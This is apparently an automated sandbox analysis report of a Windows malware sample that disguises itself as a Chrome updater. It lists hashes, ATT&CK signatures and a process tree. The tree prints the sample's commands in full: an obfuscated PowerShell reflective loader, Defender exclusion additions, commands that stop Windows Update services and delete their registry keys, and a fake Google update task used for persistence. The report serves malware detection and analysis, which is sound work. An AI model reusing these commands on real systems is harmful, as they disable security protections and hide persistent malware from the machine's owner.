78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859

Analysis

max time kernel
301s
max time network
303s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
30-10-2022 22:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859.exe
Size

2.8MB
MD5

9253ed091d81e076a3037e12af3dc871
SHA1

ec02829a25b3bf57ad061bbe54180d0c99c76981
SHA256

78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859
SHA512

29ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4
SSDEEP

49152:xkWZLeZVfE7GQFHJUXhr3o2AmO+gpMsv6gFcPJBpaAo1AIU7LXPyPZTzeRJ38AoW:xL1eY7bFpUxr3fAjAVRJBpPAUPyBnUy6

Score

10^/10

evasion persistence

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

powershell.EXEpowershell.EXE

description pid process target process

PID 2008 created 416 2008 powershell.EXE winlogon.exe
PID 1616 created 416 1616 powershell.EXE winlogon.exe
Executes dropped EXE 1 IoCs

Processes:

updater.exe

pid process

884 updater.exe

description	pid	process	target process
PID 2008 created 416	2008	powershell.EXE	winlogon.exe
PID 1616 created 416	1616	powershell.EXE	winlogon.exe

pid	process
884	updater.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

services.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinRing0_1_2_0\ImagePath = "\\??\\C:\\Program Files\\Google\\Libs\\WR64.sys"	services.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Loads dropped DLL 1 IoCs

Processes:

taskeng.exe

pid process

1396 taskeng.exe

pid	process
1396	taskeng.exe

Drops file in System32 directory 5 IoCs

Processes:

svchost.exepowershell.EXEpowershell.EXEpowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC	svchost.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859.exepowershell.EXEpowershell.EXEupdater.exe

description	pid	process	target process
PID 1760 set thread context of 1636	1760	78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859.exe	dialer.exe
PID 2008 set thread context of 1152	2008	powershell.EXE	dllhost.exe
PID 1616 set thread context of 1572	1616	powershell.EXE	dllhost.exe
PID 884 set thread context of 1884	884	updater.exe	dialer.exe
PID 884 set thread context of 580	884	updater.exe	dialer.exe

Drops file in Program Files directory 4 IoCs

Processes:

cmd.exe78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859.exeupdater.execmd.exe

description	ioc	process
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Chrome\updater.exe	78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Drops file in Windows directory 6 IoCs

Processes:

svchost.exedialer.exe

description	ioc	process
File opened for modification	C:\Windows\appcompat\programs\RecentFileCache.bcf	svchost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	svchost.exe
File created	C:\Windows\Tasks\dialersvc32.job	dialer.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	dialer.exe
File created	C:\Windows\Tasks\dialersvc64.job	dialer.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	dialer.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

316 sc.exe
768 sc.exe
1152 sc.exe
1336 sc.exe
1796 sc.exe
1604 sc.exe
1196 sc.exe
1512 sc.exe
976 sc.exe
1852 sc.exe

pid	process
316	sc.exe
768	sc.exe
1152	sc.exe
1336	sc.exe
1796	sc.exe
1604	sc.exe
1196	sc.exe
1512	sc.exe
976	sc.exe
1852	sc.exe

Checks processor information in registry 2 TTPs 12 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wmiprvse.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

2012 schtasks.exe
2028 schtasks.exe

pid	process
2012	schtasks.exe
2028	schtasks.exe

Modifies data under HKEY_USERS 3 IoCs

Processes:

powershell.EXEWMIC.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 704d37aaadecd801	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.EXEdllhost.exepowershell.EXEpowershell.exedllhost.exepowershell.exe

pid	process
1316	powershell.exe
1588	powershell.exe
1800	powershell.exe
2008	powershell.EXE
2008	powershell.EXE
1152	dllhost.exe
1152	dllhost.exe
1152	dllhost.exe
1152	dllhost.exe
1616	powershell.EXE
1976	powershell.exe
1152	dllhost.exe
1152	dllhost.exe
1152	dllhost.exe
1152	dllhost.exe
1152	dllhost.exe
1152	dllhost.exe
1152	dllhost.exe
1152	dllhost.exe
1152	dllhost.exe
1152	dllhost.exe
1152	dllhost.exe
1152	dllhost.exe
1152	dllhost.exe
1152	dllhost.exe
1152	dllhost.exe
1152	dllhost.exe
1152	dllhost.exe
1152	dllhost.exe
1152	dllhost.exe
1152	dllhost.exe
1152	dllhost.exe
1152	dllhost.exe
1152	dllhost.exe
1152	dllhost.exe
1152	dllhost.exe
1152	dllhost.exe
1152	dllhost.exe
1152	dllhost.exe
1152	dllhost.exe
1152	dllhost.exe
1616	powershell.EXE
1572	dllhost.exe
1572	dllhost.exe
1572	dllhost.exe
1572	dllhost.exe
1152	dllhost.exe
1152	dllhost.exe
1572	dllhost.exe
1572	dllhost.exe
1152	dllhost.exe
1152	dllhost.exe
1572	dllhost.exe
1572	dllhost.exe
1572	dllhost.exe
1572	dllhost.exe
1152	dllhost.exe
1152	dllhost.exe
1484	powershell.exe
1572	dllhost.exe
1572	dllhost.exe
1152	dllhost.exe
1152	dllhost.exe
1572	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

1204 Explorer.EXE
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

services.exe

pid process

464 services.exe

pid	process
1204	Explorer.EXE

pid	process
464	services.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowershell.exepowershell.EXEdllhost.exepowershell.EXEsvchost.exepowershell.exedllhost.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exeupdater.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	1316	powershell.exe
Token: SeShutdownPrivilege	1880	powercfg.exe
Token: SeShutdownPrivilege	2028	powercfg.exe
Token: SeDebugPrivilege	1588	powershell.exe
Token: SeShutdownPrivilege	1260	powercfg.exe
Token: SeShutdownPrivilege	620	powercfg.exe
Token: SeDebugPrivilege	1800	powershell.exe
Token: SeDebugPrivilege	2008	powershell.EXE
Token: SeDebugPrivilege	2008	powershell.EXE
Token: SeDebugPrivilege	1152	dllhost.exe
Token: SeDebugPrivilege	1616	powershell.EXE
Token: SeAuditPrivilege	868	svchost.exe
Token: SeDebugPrivilege	1976	powershell.exe
Token: SeDebugPrivilege	1616	powershell.EXE
Token: SeDebugPrivilege	1572	dllhost.exe
Token: SeAuditPrivilege	868	svchost.exe
Token: SeShutdownPrivilege	1488	powercfg.exe
Token: SeDebugPrivilege	1484	powershell.exe
Token: SeShutdownPrivilege	928	powercfg.exe
Token: SeShutdownPrivilege	1236	powercfg.exe
Token: SeShutdownPrivilege	1616	powercfg.exe
Token: SeDebugPrivilege	884	updater.exe
Token: SeAssignPrimaryTokenPrivilege	1776	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1776	WMIC.exe
Token: SeSecurityPrivilege	1776	WMIC.exe
Token: SeTakeOwnershipPrivilege	1776	WMIC.exe
Token: SeLoadDriverPrivilege	1776	WMIC.exe
Token: SeSystemtimePrivilege	1776	WMIC.exe
Token: SeBackupPrivilege	1776	WMIC.exe
Token: SeRestorePrivilege	1776	WMIC.exe
Token: SeShutdownPrivilege	1776	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1776	WMIC.exe
Token: SeUndockPrivilege	1776	WMIC.exe
Token: SeManageVolumePrivilege	1776	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1776	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1776	WMIC.exe
Token: SeSecurityPrivilege	1776	WMIC.exe
Token: SeTakeOwnershipPrivilege	1776	WMIC.exe
Token: SeLoadDriverPrivilege	1776	WMIC.exe
Token: SeSystemtimePrivilege	1776	WMIC.exe
Token: SeBackupPrivilege	1776	WMIC.exe
Token: SeRestorePrivilege	1776	WMIC.exe
Token: SeShutdownPrivilege	1776	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1776	WMIC.exe
Token: SeUndockPrivilege	1776	WMIC.exe
Token: SeManageVolumePrivilege	1776	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	868	svchost.exe
Token: SeIncreaseQuotaPrivilege	868	svchost.exe
Token: SeSecurityPrivilege	868	svchost.exe
Token: SeTakeOwnershipPrivilege	868	svchost.exe
Token: SeLoadDriverPrivilege	868	svchost.exe
Token: SeSystemtimePrivilege	868	svchost.exe
Token: SeBackupPrivilege	868	svchost.exe
Token: SeRestorePrivilege	868	svchost.exe
Token: SeShutdownPrivilege	868	svchost.exe
Token: SeSystemEnvironmentPrivilege	868	svchost.exe
Token: SeUndockPrivilege	868	svchost.exe
Token: SeManageVolumePrivilege	868	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	868	svchost.exe
Token: SeIncreaseQuotaPrivilege	868	svchost.exe
Token: SeSecurityPrivilege	868	svchost.exe
Token: SeTakeOwnershipPrivilege	868	svchost.exe
Token: SeLoadDriverPrivilege	868	svchost.exe
Token: SeSystemtimePrivilege	868	svchost.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

Explorer.EXE

pid process

1204 Explorer.EXE
1204 Explorer.EXE
Suspicious use of SendNotifyMessage 2 IoCs

Processes:

Explorer.EXE

pid process

1204 Explorer.EXE
1204 Explorer.EXE

pid	process
1204	Explorer.EXE
1204	Explorer.EXE

pid	process
1204	Explorer.EXE
1204	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859.execmd.execmd.exepowershell.exe

description	pid	process	target process
PID 1760 wrote to memory of 1316	1760	78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859.exe	powershell.exe
PID 1760 wrote to memory of 1316	1760	78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859.exe	powershell.exe
PID 1760 wrote to memory of 1316	1760	78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859.exe	powershell.exe
PID 1760 wrote to memory of 1108	1760	78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859.exe	cmd.exe
PID 1760 wrote to memory of 1108	1760	78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859.exe	cmd.exe
PID 1760 wrote to memory of 1108	1760	78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859.exe	cmd.exe
PID 1760 wrote to memory of 572	1760	78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859.exe	cmd.exe
PID 1760 wrote to memory of 572	1760	78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859.exe	cmd.exe
PID 1760 wrote to memory of 572	1760	78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859.exe	cmd.exe
PID 1760 wrote to memory of 1588	1760	78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859.exe	powershell.exe
PID 1760 wrote to memory of 1588	1760	78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859.exe	powershell.exe
PID 1760 wrote to memory of 1588	1760	78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859.exe	powershell.exe
PID 1108 wrote to memory of 976	1108	cmd.exe	sc.exe
PID 1108 wrote to memory of 976	1108	cmd.exe	sc.exe
PID 1108 wrote to memory of 976	1108	cmd.exe	sc.exe
PID 572 wrote to memory of 1880	572	cmd.exe	powercfg.exe
PID 572 wrote to memory of 1880	572	cmd.exe	powercfg.exe
PID 572 wrote to memory of 1880	572	cmd.exe	powercfg.exe
PID 1108 wrote to memory of 1152	1108	cmd.exe	sc.exe
PID 1108 wrote to memory of 1152	1108	cmd.exe	sc.exe
PID 1108 wrote to memory of 1152	1108	cmd.exe	sc.exe
PID 1108 wrote to memory of 1336	1108	cmd.exe	sc.exe
PID 1108 wrote to memory of 1336	1108	cmd.exe	sc.exe
PID 1108 wrote to memory of 1336	1108	cmd.exe	sc.exe
PID 572 wrote to memory of 2028	572	cmd.exe	powercfg.exe
PID 572 wrote to memory of 2028	572	cmd.exe	powercfg.exe
PID 572 wrote to memory of 2028	572	cmd.exe	powercfg.exe
PID 1108 wrote to memory of 316	1108	cmd.exe	sc.exe
PID 1108 wrote to memory of 316	1108	cmd.exe	sc.exe
PID 1108 wrote to memory of 316	1108	cmd.exe	sc.exe
PID 572 wrote to memory of 1260	572	cmd.exe	powercfg.exe
PID 572 wrote to memory of 1260	572	cmd.exe	powercfg.exe
PID 572 wrote to memory of 1260	572	cmd.exe	powercfg.exe
PID 572 wrote to memory of 620	572	cmd.exe	powercfg.exe
PID 572 wrote to memory of 620	572	cmd.exe	powercfg.exe
PID 572 wrote to memory of 620	572	cmd.exe	powercfg.exe
PID 1108 wrote to memory of 1852	1108	cmd.exe	sc.exe
PID 1108 wrote to memory of 1852	1108	cmd.exe	sc.exe
PID 1108 wrote to memory of 1852	1108	cmd.exe	sc.exe
PID 1588 wrote to memory of 2012	1588	powershell.exe	schtasks.exe
PID 1588 wrote to memory of 2012	1588	powershell.exe	schtasks.exe
PID 1588 wrote to memory of 2012	1588	powershell.exe	schtasks.exe
PID 1108 wrote to memory of 1976	1108	cmd.exe	reg.exe
PID 1108 wrote to memory of 1976	1108	cmd.exe	reg.exe
PID 1108 wrote to memory of 1976	1108	cmd.exe	reg.exe
PID 1108 wrote to memory of 1972	1108	cmd.exe	reg.exe
PID 1108 wrote to memory of 1972	1108	cmd.exe	reg.exe
PID 1108 wrote to memory of 1972	1108	cmd.exe	reg.exe
PID 1108 wrote to memory of 880	1108	cmd.exe	reg.exe
PID 1108 wrote to memory of 880	1108	cmd.exe	reg.exe
PID 1108 wrote to memory of 880	1108	cmd.exe	reg.exe
PID 1108 wrote to memory of 580	1108	cmd.exe	reg.exe
PID 1108 wrote to memory of 580	1108	cmd.exe	reg.exe
PID 1108 wrote to memory of 580	1108	cmd.exe	reg.exe
PID 1108 wrote to memory of 1792	1108	cmd.exe	reg.exe
PID 1108 wrote to memory of 1792	1108	cmd.exe	reg.exe
PID 1108 wrote to memory of 1792	1108	cmd.exe	reg.exe
PID 1760 wrote to memory of 1636	1760	78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859.exe	dialer.exe
PID 1760 wrote to memory of 1636	1760	78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859.exe	dialer.exe
PID 1760 wrote to memory of 1636	1760	78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859.exe	dialer.exe
PID 1760 wrote to memory of 1636	1760	78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859.exe	dialer.exe
PID 1760 wrote to memory of 1800	1760	78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859.exe	powershell.exe
PID 1760 wrote to memory of 1800	1760	78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859.exe	powershell.exe
PID 1760 wrote to memory of 1800	1760	78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859.exe	powershell.exe

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:472

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
- Sets service image path in registry
- Suspicious behavior: LoadsDriver
PID:464

C:\Windows\system32\sppsvc.exe
C:\Windows\system32\sppsvc.exe
2⤵
PID:744

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
2⤵
PID:1708

C:\Windows\system32\taskhost.exe
"taskhost.exe"
2⤵
PID:1112

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
2⤵
PID:1072

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
2⤵
PID:684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService
2⤵
PID:340

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:868

C:\Windows\system32\taskeng.exe
taskeng.exe {970613D6-5178-4ED2-B52D-D05B1B8A3BA3} S-1-5-18:NT AUTHORITY\System:Service:
3⤵
- Loads dropped DLL
PID:1396

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2008

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1616

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:884

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1976

C:\Windows\system32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
5⤵
PID:1092

C:\Windows\system32\sc.exe
sc stop UsoSvc
6⤵
- Launches sc.exe
PID:1796

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
6⤵
- Launches sc.exe
PID:1604

C:\Windows\system32\sc.exe
sc stop wuauserv
6⤵
- Launches sc.exe
PID:1196

C:\Windows\system32\sc.exe
sc stop bits
6⤵
- Launches sc.exe
PID:1512

C:\Windows\system32\sc.exe
sc stop dosvc
6⤵
- Launches sc.exe
PID:768

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
6⤵
PID:964

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
6⤵
PID:1540

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
6⤵
PID:1660

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
6⤵
PID:560

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
6⤵
PID:1704

C:\Windows\system32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
5⤵
PID:1148

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1488

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:928

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1236

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1616

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1484

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
6⤵
- Creates scheduled task(s)
PID:2028

C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe xtrjicqmdliu
5⤵
PID:1884

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
6⤵
- Drops file in Program Files directory
PID:740

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
7⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1776

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
5⤵
- Drops file in Program Files directory
PID:1048

C:\Windows\system32\dialer.exe
